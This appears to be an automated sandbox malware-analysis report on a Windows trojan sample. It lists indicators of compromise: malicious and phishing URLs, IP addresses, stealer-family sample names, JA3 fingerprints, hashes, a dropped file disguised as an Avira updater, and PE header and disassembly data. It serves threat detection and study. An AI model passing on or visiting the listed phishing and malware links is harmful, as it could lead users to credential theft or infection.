                                                                        https://clickme.thryv.com/ls/click?upn=u001.Als7cfHaJU2yMdsJgpsIFl1bBkz1ufgENuAZF1ODXRkOEXcot-2BlieaBFtd0IhXM08Jp__OEO3HRIZ3eedLymwLhvJt9sqs3j4T3CqpVCO9A0ZKplqH1W1Ad1lCPdQBrRfbSauZPLLCLTYBsXDRt8yGG5FOZ7NK342oFTufTBA9n-2F9XZOxzyaiykDuoFljiX91jkOGF7TGq8s59HY1LfNpqOHr1hEZu4XswpdGfGTbIsw4Mg7Ewx-2FAzTwbYOEI5c5W9xQE63UMPeYSBL2GJwQizVTVETCyjhoaIq4ot5vl7L-2BMO3KbJCX7vVUyT6NGOFhbY99Ap0lxFmjxSsCRRr7CrNGrevXE9jp8IJyovKPHHX6-2FxnVR-2BVdKd5S1Zkq94QkyDWCs9lCPSQ3LNxOSscF1edS7fTz6-2Bswo-2FZW2dAOCyCTKBxs-3D#Ymhhc2thci5zYW1iYXNpdmFuQHNhYW1hLmNvbQ==Get hashmaliciousUnknownBrowse
                                                                        • 188.114.96.3
                                                                        SecuriteInfo.com.Win32.MalwareX-gen.27131.14737.exeGet hashmaliciousUnknownBrowse
                                                                        • 172.67.130.49
                                                                        CLOUDFLARENETUSCLQD.htmGet hashmaliciousHTMLPhisherBrowse
                                                                        • 104.17.25.14
                                                                        file.exeGet hashmaliciousLummaCBrowse
                                                                        • 172.67.208.139
                                                                        https://link.trustpilot.com/ls/click?upn=u001.j-2BMD1rpUvfXVasz-2BUEF8v0gLqESYoH9OAOsEpvf5KFmayNUiIMUjOj-2F6xodjiwswXbJ5_rTIZcwdFQl8UVV0MQoqEOCgBw9W2jwyOcNXSjRnCSMzbe6L3Ws0d2debfLDgpXs6CwbIbJZZu0mJQCWbk0Mk14nO-2BxU9-2Blvuk1zQgy1VNRLMg1mRxfI5Q1Of5KhvuoPcWQXwBfEAkkr-2Bvt3Og4Y94IbOhDED0tzgJSAB1f90rFx1hm7V7-2F8MmLwvZJdulRBMTVbBzixYtMU1elLHm4R6vA-3D-3D#Ymhhc2thci5zYW1iYXNpdmFuQHNhYW1hLmNvbQ==Get hashmaliciousUnknownBrowse
                                                                        • 104.26.4.39
                                                                        https://solvetherecaptcha404.webflow.io/404Get hashmaliciousUnknownBrowse
                                                                        • 104.18.160.117
                                                                        Daniel Leblanc shared _Incendie Hudson._ with you. #12.emlGet hashmaliciousUnknownBrowse
                                                                        • 104.16.117.116
                                                                        https://empshentel.com/share/sharefile/Get hashmaliciousHTMLPhisherBrowse
                                                                        • 172.67.177.128
                                                                        file.exeGet hashmaliciousLummaC, VidarBrowse
                                                                        • 172.67.208.139
                                                                        http://egynte.com/Get hashmaliciousUnknownBrowse
                                                                        • 1.1.1.1
                                                                        https://clickme.thryv.com/ls/click?upn=u001.Als7cfHaJU2yMdsJgpsIFl1bBkz1ufgENuAZF1ODXRkOEXcot-2BlieaBFtd0IhXM08Jp__OEO3HRIZ3eedLymwLhvJt9sqs3j4T3CqpVCO9A0ZKplqH1W1Ad1lCPdQBrRfbSauZPLLCLTYBsXDRt8yGG5FOZ7NK342oFTufTBA9n-2F9XZOxzyaiykDuoFljiX91jkOGF7TGq8s59HY1LfNpqOHr1hEZu4XswpdGfGTbIsw4Mg7Ewx-2FAzTwbYOEI5c5W9xQE63UMPeYSBL2GJwQizVTVETCyjhoaIq4ot5vl7L-2BMO3KbJCX7vVUyT6NGOFhbY99Ap0lxFmjxSsCRRr7CrNGrevXE9jp8IJyovKPHHX6-2FxnVR-2BVdKd5S1Zkq94QkyDWCs9lCPSQ3LNxOSscF1edS7fTz6-2Bswo-2FZW2dAOCyCTKBxs-3D#Ymhhc2thci5zYW1iYXNpdmFuQHNhYW1hLmNvbQ==Get hashmaliciousUnknownBrowse
                                                                        • 188.114.96.3
                                                                        SecuriteInfo.com.Win32.MalwareX-gen.27131.14737.exeGet hashmaliciousUnknownBrowse
                                                                        • 172.67.130.49

                                                                        JA3 Fingerprints

                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                        a0e9f5d64349fb13191bc781f81f42e1file.exeGet hashmaliciousLummaCBrowse
                                                                        • 104.21.4.136
                                                                        • 188.114.97.3
                                                                        • 172.67.162.108
                                                                        • 172.67.128.144
                                                                        • 188.114.96.3
                                                                        • 104.102.49.254
                                                                        • 172.67.208.139
                                                                        file.exeGet hashmaliciousLummaC, VidarBrowse
                                                                        • 104.21.4.136
                                                                        • 188.114.97.3
                                                                        • 172.67.162.108
                                                                        • 172.67.128.144
                                                                        • 188.114.96.3
                                                                        • 104.102.49.254
                                                                        • 172.67.208.139
                                                                        file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                                        • 104.21.4.136
                                                                        • 188.114.97.3
                                                                        • 172.67.162.108
                                                                        • 172.67.128.144
                                                                        • 188.114.96.3
                                                                        • 104.102.49.254
                                                                        • 172.67.208.139
                                                                        http://google.comGet hashmaliciousLummaCBrowse
                                                                        • 104.21.4.136
                                                                        • 188.114.97.3
                                                                        • 172.67.162.108
                                                                        • 172.67.128.144
                                                                        • 188.114.96.3
                                                                        • 104.102.49.254
                                                                        • 172.67.208.139
                                                                        https://finalstepgo.com/uploads/il2.txtGet hashmaliciousLummaCBrowse
                                                                        • 104.21.4.136
                                                                        • 188.114.97.3
                                                                        • 172.67.162.108
                                                                        • 172.67.128.144
                                                                        • 188.114.96.3
                                                                        • 104.102.49.254
                                                                        • 172.67.208.139
                                                                        https://laurachenel-my.sharepoint.com/:f:/p/durae/EqNLWpSMEBRJoccjxMrYR9cBuepxDM4GGslgNeOpyvFENQ?e=1C1jRHGet hashmaliciousUnknownBrowse
                                                                        • 104.21.4.136
                                                                        • 188.114.97.3
                                                                        • 172.67.162.108
                                                                        • 172.67.128.144
                                                                        • 188.114.96.3
                                                                        • 104.102.49.254
                                                                        • 172.67.208.139
                                                                        0.dllGet hashmaliciousBazar Loader, BruteRatel, LatrodectusBrowse
                                                                        • 104.21.4.136
                                                                        • 188.114.97.3
                                                                        • 172.67.162.108
                                                                        • 172.67.128.144
                                                                        • 188.114.96.3
                                                                        • 104.102.49.254
                                                                        • 172.67.208.139
                                                                        DropboxInstaller.exeGet hashmaliciousUnknownBrowse
                                                                        • 104.21.4.136
                                                                        • 188.114.97.3
                                                                        • 172.67.162.108
                                                                        • 172.67.128.144
                                                                        • 188.114.96.3
                                                                        • 104.102.49.254
                                                                        • 172.67.208.139
                                                                        DropboxInstaller.exeGet hashmaliciousUnknownBrowse
                                                                        • 104.21.4.136
                                                                        • 188.114.97.3
                                                                        • 172.67.162.108
                                                                        • 172.67.128.144
                                                                        • 188.114.96.3
                                                                        • 104.102.49.254
                                                                        • 172.67.208.139

                                                                        Dropped Files

                                                                        No context

                                                                        Created / dropped Files

                                                                        C:\Users\user\Music\AviraUpdater\AviraOculus.exe

                                                                        Download File
                                                                        Process:C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe
                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):976635604
                                                                        Entropy (8bit):0.06714450256170998
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:8BE4BFF57BE5FD22245CC37F593A8403
                                                                        SHA1:D60EE5C2C022DA0C44BD8DF6C3DD92F0770B1252
                                                                        SHA-256:5F9DF9BC97FF925BF63CA3D131F02029A02AA15BE6646545A26B864349EC671A
                                                                        SHA-512:EC75CBB84F8BE0A4892FA90A4386BE61D894FB76ECF99CED18E29962EB641819585A287BD2B5DFF855CCB4427E1E24F5C6186BE2460B12208382147AEAA32B32
                                                                        Malicious:false
                                                                        Reputation:low
                                                                        Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L.....D_..................)..L......D))......0)...@...........................J.......;..........@....................+.^....p+..;...p/.`b....................+..{............................+......................z+.$.....+......................text.....).......(................. ..`.itext... ....).......(............. ..`.data........0).......).............@....bss..........).......)..................idata...@...p+..<....).............@....didata.......+.......).............@....edata........+.......).............@..@.tls..........+.......)..................rdata........+.......).............@..@.rsrc...`b...p/..d....).............@..@......................................................6.......4.............@..@................

                                                                        Static File Info

                                                                        General

                                                                        File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                        Entropy (8bit):6.916936552707879
                                                                        TrID:
                                                                        • Win32 Executable (generic) a (10002005/4) 98.45%
                                                                        • Inno Setup installer (109748/4) 1.08%
                                                                        • Win32 EXE PECompact compressed (generic) (41571/9) 0.41%
                                                                        • Win16/32 Executable Delphi generic (2074/23) 0.02%
                                                                        • Generic Win/DOS Executable (2004/3) 0.02%
                                                                        File name:SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe
                                                                        File size:4'547'072 bytes
                                                                        MD5:aaf6f0c0f007e9462c8bf58acd555caf
                                                                        SHA1:0125e82a9f1ec4297c6d3bf8f541882b5531f5f6
                                                                        SHA256:927f2074ad7b76b46535cc94eb1fb357e528258dd0e55d828decb5ff5e70d2b9
                                                                        SHA512:10dda1dd3d3f314f121402ed68e7647ace982837d2a2806be59e202efe1a4d5b5327a697b78db2a5bb610e3219e5bb7180b60fd5f90efa3c239aa9c7c737034b
                                                                        SSDEEP:98304:tUimFOVwFe8GZ0BbNiiFEqTMij7I6Z53T1J:q1E6dTX
                                                                        TLSH:AB267DDE72C6243EC067163359264960D83BBB3125B788CFFAA46D0CCE35253A935E5B
                                                                        File Content Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7.......................................................................................................................................

                                                                        File Icon

                                                                        Icon Hash:3279ece68ccc7186

                                                                        Static PE Info

                                                                        General

                                                                        Entrypoint:0x692944
                                                                        Entrypoint Section:.itext
                                                                        Digitally signed:false
                                                                        Imagebase:0x400000
                                                                        Subsystem:windows gui
                                                                        Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
                                                                        DLL Characteristics:
                                                                        Time Stamp:0x5F44F5B2 [Tue Aug 25 11:27:46 2020 UTC]
                                                                        TLS Callbacks:
                                                                        CLR (.Net) Version:
                                                                        OS Version Major:5
                                                                        OS Version Minor:0
                                                                        File Version Major:5
                                                                        File Version Minor:0
                                                                        Subsystem Version Major:5
                                                                        Subsystem Version Minor:0
                                                                        Import Hash:3b9a78dc6660323834e59d95d337069d

                                                                        Entrypoint Preview

                                                                        Instruction
                                                                        push ebp
                                                                        mov ebp, esp
                                                                        add esp, FFFFFFF0h
                                                                        mov eax, 00689774h
                                                                        call 00007F9FDC3F4581h
                                                                        mov eax, dword ptr [0069CA38h]
                                                                        mov eax, dword ptr [eax]
                                                                        call 00007F9FDC5BA449h
                                                                        mov cl, 01h
                                                                        mov edx, 006929B8h
                                                                        mov eax, dword ptr [005800D8h]
                                                                        call 00007F9FDC579A6Ch
                                                                        mov eax, dword ptr [0069CA38h]
                                                                        mov eax, dword ptr [eax]
                                                                        mov edx, 006929E4h
                                                                        call 00007F9FDC5B9DD7h
                                                                        mov ecx, dword ptr [0069C6F0h]
                                                                        mov eax, dword ptr [0069CA38h]
                                                                        mov eax, dword ptr [eax]
                                                                        mov edx, dword ptr [00645DE8h]
                                                                        call 00007F9FDC5BA427h
                                                                        mov eax, dword ptr [0069CA38h]
                                                                        mov eax, dword ptr [eax]
                                                                        call 00007F9FDC5BA57Fh
                                                                        call 00007F9FDC3EF55Eh
                                                                        add byte ptr [eax-00FFFDFCh], dh

                                                                        Data Directories

                                                                        NameVirtual AddressVirtual Size Is in Section
                                                                        IMAGE_DIRECTORY_ENTRY_EXPORT0x2bc0000x5e.edata
                                                                        IMAGE_DIRECTORY_ENTRY_IMPORT0x2b70000x3b14.idata
                                                                        IMAGE_DIRECTORY_ENTRY_RESOURCE0x2f70000x1b6260.rsrc
                                                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_BASERELOC0x2bf0000x37b08.rdata
                                                                        IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_TLS0x2be0000x18.rdata
                                                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_IAT0x2b7adc0x924.idata
                                                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x2bb0000x9c8.didata
                                                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                        Sections

                                                                        NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                        .text0x10000x2900000x28f8002a15afc612f88bad6fc9959d1810be9aunknownunknownunknownunknownIMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                        .itext0x2910000x20000x1a00504965db41100728bc9070db8befe522False0.548828125data6.36148269338948IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                        .data0x2930000xa0000x9e00dc136f9e391b47d45742c91a2dbda720False0.5509790348101266data6.09210320597965IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                        .bss0x29d0000x1a0000x1a000e2dea636cc20a1561f745ca26dc8a00dFalse0.45229867788461536COM executable for DOS6.282720732739078IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                        .idata0x2b70000x40000x3c00258fa3952c7b35db824065c72de12a90False0.30703125COM executable for DOS5.206596534218449IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                        .didata0x2bb0000x10000xa005bf853b0d8341fdcf019a37d6ec39315False0.3609375data4.222908981473441IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                        .edata0x2bc0000x10000x200c716644d620d407bb607fc2d4f6b41b1False0.1640625data1.103632065510809IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                        .tls0x2bd0000x10000x1000d4256c41ce19c2cb5cf615cbc31e10c9False0.305419921875data3.110284690356277IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                        .rdata0x2be0000x390000x2003986a1c707994a5e9b5e883e279780faFalse0.05078125data0.2108262677871819IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                        .rsrc0x2f70000x1b62600x1b6400282b2930746de2dc39d35f781bcea3ebFalse0.41272606335567597data7.1817091597183715IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                                        Resources

                                                                        NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                        BRANDING0x2fa24c0xf2d8PE32 executable (DLL) (GUI) Intel 80386, for MS WindowsEnglishGreat Britain0.5785452322738386
                                                                        INI0x3095240x4338ISO-8859 text, with CRLF line terminatorsEnglishUnited States0.19217805671780566
                                                                        INI0x30d85c0x701Generic INItialization configuration [Missing Shared DLLs]EnglishUnited States0.36698271054099274
                                                                        INI0x30df600x2d2feISO-8859 text, with CRLF line terminatorsEnglishUnited States0.14998433160800925
                                                                        VCLSTYLE0x33b2600x12e5bdataEnglishUnited States0.9555960363293412
                                                                        RT_CURSOR0x34e0bc0x134dataEnglishUnited States0.43506493506493504
                                                                        RT_CURSOR0x34e1f00x134dataEnglishUnited States0.4642857142857143
                                                                        RT_CURSOR0x34e3240x134dataEnglishUnited States0.4805194805194805
                                                                        RT_CURSOR0x34e4580x134dataEnglishUnited States0.38311688311688313
                                                                        RT_CURSOR0x34e58c0x134dataEnglishUnited States0.36038961038961037
                                                                        RT_CURSOR0x34e6c00x134dataEnglishUnited States0.4090909090909091
                                                                        RT_CURSOR0x34e7f40x134Targa image data - RGB 64 x 65536 x 1 +32 "\001"EnglishUnited States0.4967532467532468
                                                                        RT_CURSOR0x34e9280x134Targa image data - Map 64 x 65536 x 1 +32 "\001"EnglishUnited States0.38636363636363635
                                                                        RT_BITMAP0x34ea5c0x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 360EnglishUnited States0.43103448275862066
                                                                        RT_BITMAP0x34ec2c0x1e4Device independent bitmap graphic, 36 x 19 x 4, image size 380EnglishUnited States0.46487603305785125
                                                                        RT_BITMAP0x34ee100x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 360EnglishUnited States0.43103448275862066
                                                                        RT_BITMAP0x34efe00x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 360EnglishUnited States0.39870689655172414
                                                                        RT_BITMAP0x34f1b00x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 360EnglishUnited States0.4245689655172414
                                                                        RT_BITMAP0x34f3800x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 360EnglishUnited States0.5021551724137931
                                                                        RT_BITMAP0x34f5500x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 360EnglishUnited States0.5064655172413793
                                                                        RT_BITMAP0x34f7200x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 360EnglishUnited States0.39655172413793105
                                                                        RT_BITMAP0x34f8f00x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 360EnglishUnited States0.5344827586206896
                                                                        RT_BITMAP0x34fac00x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 360EnglishUnited States0.39655172413793105
                                                                        RT_BITMAP0x34fc900x98Device independent bitmap graphic, 9 x 6 x 4, image size 48, 16 important colorsEnglishUnited States0.5197368421052632
                                                                        RT_BITMAP0x34fd280x98Device independent bitmap graphic, 9 x 6 x 4, image size 48, 16 important colorsEnglishUnited States0.506578947368421
                                                                        RT_ICON0x34fdc00x468Device independent bitmap graphic, 16 x 32 x 32, image size 1024, resolution 3779 x 3779 px/mEnglishUnited States0.3608156028368794
                                                                        RT_ICON0x3502280x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4096, resolution 3779 x 3779 px/mEnglishUnited States0.2098968105065666
                                                                        RT_ICON0x3512d00x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9216, resolution 3779 x 3779 px/mEnglishUnited States0.15809128630705394
                                                                        RT_ICON0x3538780x4228Device independent bitmap graphic, 64 x 128 x 32, image size 16384, resolution 3779 x 3779 px/mEnglishUnited States0.12688946622579123
                                                                        RT_ICON0x357aa00x10828Device independent bitmap graphic, 128 x 256 x 32, image size 65536, resolution 3779 x 3779 px/mEnglishUnited States0.07723589258251508
                                                                        RT_MENU0x3682c80x5edataEnglishGreat Britain0.8617021276595744
                                                                        RT_MENU0x3683280x13cdataEnglishGreat Britain0.49683544303797467
                                                                        RT_MENU0x3684640x8edataEnglishGreat Britain0.6971830985915493
                                                                        RT_MENU0x3684f40x1aadataEnglishGreat Britain0.42018779342723006
                                                                        RT_MENU0x3686a00xdadataEnglishGreat Britain0.6238532110091743
                                                                        RT_MENU0x36877c0x164dataEnglishGreat Britain0.547752808988764
                                                                        RT_MENU0x3688e00xbedataEnglishGreat Britain0.6368421052631579
                                                                        RT_MENU0x3689a00xaedataEnglishGreat Britain0.632183908045977
                                                                        RT_MENU0x368a500xb8dataEnglishGreat Britain0.657608695652174
                                                                        RT_DIALOG0x368b080x530dataEnglishGreat Britain0.42846385542168675
                                                                        RT_DIALOG0x3690380x238dataEnglishGreat Britain0.4982394366197183
                                                                        RT_DIALOG0x3692700xe8dataEnglishGreat Britain0.6508620689655172
                                                                        RT_DIALOG0x3693580x1c8dataEnglishGreat Britain0.5657894736842105
                                                                        RT_DIALOG0x3695200x1e0dataEnglishGreat Britain0.49166666666666664
                                                                        RT_DIALOG0x3697000x1acdataEnglishGreat Britain0.5607476635514018
                                                                        RT_DIALOG0x3698ac0x1ccdataEnglishGreat Britain0.5
                                                                        RT_DIALOG0x369a780x1e4dataEnglishGreat Britain0.5206611570247934
                                                                        RT_DIALOG0x369c5c0x33cdataEnglishGreat Britain0.358695652173913
                                                                        RT_DIALOG0x369f980x6b6dataEnglishGreat Britain0.3911525029103609
                                                                        RT_DIALOG0x36a6500x1a4dataEnglishGreat Britain0.5166666666666667
                                                                        RT_DIALOG0x36a7f40x1cedataEnglishGreat Britain0.48268398268398266
                                                                        RT_DIALOG0x36a9c40x4e4dataEnglishGreat Britain0.40814696485623003
                                                                        RT_DIALOG0x36aea80x57edataEnglishGreat Britain0.4139402560455192
                                                                        RT_DIALOG0x36b4280x54dataEnglishGreat Britain0.8095238095238095
                                                                        RT_DIALOG0x36b47c0xe0dataEnglishGreat Britain0.6517857142857143
                                                                        RT_DIALOG0x36b55c0x29adataEnglishGreat Britain0.47297297297297297
                                                                        RT_DIALOG0x36b7f80xdcdataEnglishGreat Britain0.6363636363636364
                                                                        RT_DIALOG0x36b8d40x70dataEnglishGreat Britain0.7857142857142857
                                                                        RT_DIALOG0x36b9440x1cedataEnglishGreat Britain0.48484848484848486
                                                                        RT_DIALOG0x36bb140x180dataEnglishGreat Britain0.5755208333333334
                                                                        RT_DIALOG0x36bc940x230dataEnglishGreat Britain0.4446428571428571
                                                                        RT_DIALOG0x36bec40xc4dataEnglishGreat Britain0.7244897959183674
                                                                        RT_DIALOG0x36bf880x14cdataEnglishGreat Britain0.5993975903614458
                                                                        RT_DIALOG0x36c0d40x462dataEnglishGreat Britain0.43137254901960786
                                                                        RT_DIALOG0x36c5380x468dataEnglishGreat Britain0.43351063829787234
                                                                        RT_DIALOG0x36c9a00x224dataEnglishGreat Britain0.5091240875912408
                                                                        RT_DIALOG0x36cbc40x286dataEnglishGreat Britain0.5046439628482973
                                                                        RT_DIALOG0x36ce4c0x1e8dataEnglishGreat Britain0.5758196721311475
                                                                        RT_DIALOG0x36d0340xc8dBase III DBT, next free block index 4294901761EnglishGreat Britain0.665
                                                                        RT_DIALOG0x36d0fc0x938dataEnglishGreat Britain0.3771186440677966
                                                                        RT_DIALOG0x36da340x462dataEnglishGreat Britain0.446524064171123
                                                                        RT_DIALOG0x36de980x48adataEnglishGreat Britain0.3717728055077453
                                                                        RT_DIALOG0x36e3240x34dataEnglishGreat Britain0.9038461538461539
                                                                        RT_DIALOG0x36e3580x336dataEnglishGreat Britain0.38929440389294406
                                                                        RT_DIALOG0x36e6900x462dataEnglishGreat Britain0.44563279857397503
                                                                        RT_DIALOG0x36eaf40xd6dBase III DBT, next free block index 4294901761EnglishGreat Britain0.7009345794392523
                                                                        RT_DIALOG0x36ebcc0x37cdataEnglishGreat Britain0.4461883408071749
                                                                        RT_DIALOG0x36ef480xd4dataEnglishGreat Britain0.6037735849056604
                                                                        RT_DIALOG0x36f01c0x2c8dataEnglishGreat Britain0.44662921348314605
                                                                        RT_DIALOG0x36f2e40x1a2dataEnglishGreat Britain0.5239234449760766
                                                                        RT_DIALOG0x36f4880x186dataEnglishGreat Britain0.5948717948717949
                                                                        RT_DIALOG0x36f6100x3b4dataEnglishGreat Britain0.4588607594936709
                                                                        RT_DIALOG0x36f9c40x38adataEnglishGreat Britain0.45916114790286977
                                                                        RT_DIALOG0x36fd500x3c8dataEnglishGreat Britain0.3894628099173554
                                                                        RT_DIALOG0x3701180x428dataEnglishGreat Britain0.36654135338345867
                                                                        RT_DIALOG0x3705400x92dataEnglishGreat Britain0.6027397260273972
                                                                        RT_DIALOG0x3705d40x39cdataEnglishGreat Britain0.4090909090909091
                                                                        RT_DIALOG0x3709700x248dataEnglishGreat Britain0.488013698630137
                                                                        RT_DIALOG0x370bb80x51cdataEnglishGreat Britain0.4258409785932722
                                                                        RT_DIALOG0x3710d40x558dataEnglishGreat Britain0.4159356725146199
                                                                        RT_DIALOG0x37162c0x4fedataEnglishGreat Britain0.4460093896713615
                                                                        RT_DIALOG0x371b2c0x544dataEnglishGreat Britain0.41839762611275966
                                                                        RT_DIALOG0x3720700x454dataEnglishGreat Britain0.4575812274368231
                                                                        RT_DIALOG0x3724c40x144dataEnglishGreat Britain0.6172839506172839
                                                                        RT_DIALOG0x3726080x514dataEnglishGreat Britain0.4276923076923077
                                                                        RT_DIALOG0x372b1c0x248dataEnglishGreat Britain0.4674657534246575
                                                                        RT_DIALOG0x372d640x1dcdataEnglishGreat Britain0.5189075630252101
                                                                        RT_DIALOG0x372f400xfcdataEnglishGreat Britain0.6746031746031746
                                                                        RT_DIALOG0x37303c0x40dataEnglishGreat Britain0.875
                                                                        RT_DIALOG0x37307c0x334dataEnglishGreat Britain0.44390243902439025
                                                                        RT_STRING0x3733b00x66Matlab v4 mat-file (little endian) C, numeric, rows 0, columns 0EnglishGreat Britain0.5882352941176471
                                                                        RT_STRING0x3734180x3a0dataEnglishGreat Britain0.3426724137931034
                                                                        RT_STRING0x3737b80x14edataEnglishGreat Britain0.45209580838323354
                                                                        RT_STRING0x3739080x112dataEnglishGreat Britain0.5656934306569343
                                                                        RT_STRING0x373a1c0x10edataEnglishGreat Britain0.5962962962962963
                                                                        RT_STRING0x373b2c0xbcdataEnglishGreat Britain0.6223404255319149
                                                                        RT_STRING0x373be80x10edataEnglishGreat Britain0.5296296296296297
                                                                        RT_STRING0x373cf80x64Matlab v4 mat-file (little endian) W, numeric, rows 0, columns 0EnglishGreat Britain0.76
                                                                        RT_STRING0x373d5c0x8cdataEnglishGreat Britain0.5214285714285715
                                                                        RT_STRING0x373de80x90dataEnglishGreat Britain0.7013888888888888
                                                                        RT_STRING0x373e780x3e6dataEnglishGreat Britain0.3897795591182365
                                                                        RT_STRING0x3742600x200dataEnglishGreat Britain0.455078125
                                                                        RT_STRING0x3744600xe4dataEnglishGreat Britain0.631578947368421
                                                                        RT_STRING0x3745440x40dataEnglishGreat Britain0.65625
                                                                        RT_STRING0x3745840xe2dataEnglishGreat Britain0.4911504424778761
                                                                        RT_STRING0x3746680x30adataEnglishGreat Britain0.32005141388174807
                                                                        RT_STRING0x3749740x4eMatlab v4 mat-file (little endian) %, numeric, rows 0, columns 0EnglishGreat Britain0.5641025641025641
                                                                        RT_STRING0x3749c40x54dataEnglishGreat Britain0.75
                                                                        RT_STRING0x374a180x2cedataEnglishGreat Britain0.38997214484679665
                                                                        RT_STRING0x374ce80x1cedataEnglishGreat Britain0.49783549783549785
                                                                        RT_STRING0x374eb80x2dcdataEnglishGreat Britain0.43579234972677594
                                                                        RT_STRING0x3751940x48adataEnglishGreat Britain0.33304647160068845
                                                                        RT_STRING0x3756200x466dataEnglishGreat Britain0.35790408525754885
                                                                        RT_STRING0x375a880x45edataEnglishGreat Britain0.35778175313059035
                                                                        RT_STRING0x375ee80xe8dataEnglishGreat Britain0.5775862068965517
                                                                        RT_STRING0x375fd00x36edataEnglishGreat Britain0.36446469248291574
                                                                        RT_STRING0x3763400x244dataEnglishGreat Britain0.41551724137931034
                                                                        RT_STRING0x3765840x30dataEnglishGreat Britain0.6666666666666666
                                                                        RT_STRING0x3765b40x84dataEnglishGreat Britain0.6060606060606061
                                                                        RT_STRING0x3766380x160dataEnglishGreat Britain0.5340909090909091
                                                                        RT_STRING0x3767980x1d4dataEnglishGreat Britain0.5042735042735043
                                                                        RT_STRING0x37696c0xb0dataEnglishGreat Britain0.6704545454545454
                                                                        RT_STRING0x376a1c0x120dataEnglishGreat Britain0.5798611111111112
                                                                        RT_STRING0x376b3c0x8edataEnglishGreat Britain0.5915492957746479
                                                                        RT_STRING0x376bcc0x240Matlab v4 mat-file (little endian) C, numeric, rows 0, columns 0EnglishGreat Britain0.4409722222222222
                                                                        RT_STRING0x376e0c0x3e2dataEnglishGreat Britain0.3983903420523139
                                                                        RT_STRING0x3771f00x390dataEnglishGreat Britain0.4144736842105263
                                                                        RT_STRING0x3775800x17edataEnglishGreat Britain0.5523560209424084
                                                                        RT_STRING0x3777000x220dataEnglishGreat Britain0.43566176470588236
                                                                        RT_STRING0x3779200x134dataEnglishGreat Britain0.5162337662337663
                                                                        RT_STRING0x377a540x3badataEnglishGreat Britain0.4025157232704403
                                                                        RT_STRING0x377e100x37edataEnglishGreat Britain0.3680089485458613
                                                                        RT_STRING0x3781900x1cadataEnglishGreat Britain0.425764192139738
                                                                        RT_STRING0x37835c0x24cdataEnglishGreat Britain0.4744897959183674
                                                                        RT_STRING0x3785a80x7edataEnglishGreat Britain0.6111111111111112
                                                                        RT_STRING0x3786280x128dataEnglishGreat Britain0.46621621621621623
                                                                        RT_STRING0x3787500x162Matlab v4 mat-file (little endian) M, numeric, rows 0, columns 0EnglishGreat Britain0.4943502824858757
                                                                        RT_STRING0x3788b40x3e8dataEnglishGreat Britain0.288
                                                                        RT_STRING0x378c9c0x322AmigaOS bitmap font "r", fc_YSize 29696, 16896 elements, 2nd "r", 3rd ""EnglishGreat Britain0.3640897755610973
                                                                        RT_STRING0x378fc00xa8dataEnglishGreat Britain0.4880952380952381
                                                                        RT_STRING0x3790680x1c8dataEnglishGreat Britain0.5263157894736842
                                                                        RT_STRING0x3792300xfcdataEnglishGreat Britain0.623015873015873
                                                                        RT_STRING0x37932c0x2b2dataEnglishGreat Britain0.463768115942029
                                                                        RT_STRING0x3795e00x7cdataEnglishGreat Britain0.717741935483871
                                                                        RT_STRING0x37965c0x5edataEnglishGreat Britain0.6808510638297872
                                                                        RT_STRING0x3796bc0x82dataEnglishGreat Britain0.7
